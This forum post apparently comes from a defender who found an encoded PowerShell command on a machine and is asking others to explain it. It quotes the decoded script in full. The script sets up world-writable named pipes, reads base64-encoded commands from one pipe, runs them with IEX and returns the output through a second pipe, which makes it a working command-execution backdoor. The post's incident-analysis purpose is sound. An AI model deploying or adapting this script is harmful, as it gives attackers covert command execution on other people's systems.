Hi all,
i've detected an attempt to execute Powershell command on a machine and after have decoding it, i retrieved these commands:
$pn = "awkywlhbod"
$pm = "xnopgdzmw6"
$sb =
{
param ($pn, $pm)
add-Type -assembly "System.Core"
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$ps.AddAccessRule($ar)
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$p.WaitForConnection();
$pr = new-object System.IO.StreamReader($p)
$o = $pr.ReadLine()
$p.Dispose();
$pr.Dispose();
$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string
$o = IEX $s |out-string
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$ps.AddAccessRule($ar)
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$p.WaitForConnection();
$pw = new-object System.IO.StreamWriter($p)
$pw.AutoFlush = $true
$pw.WriteLine($o);
$p.Dispose();
}
add-Type -assembly "System.Core"
$t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)
$pl = new-object System.IO.Pipes.NamedPipeClientStream(".", $pn);
$pp = new-object System.IO.Pipes.NamedPipeClientStream(".", $pm);
Start-Sleep 600
$t.StopJob()
Is there anyone who can help me to understand what this stand for?
Thank you very much in advance!!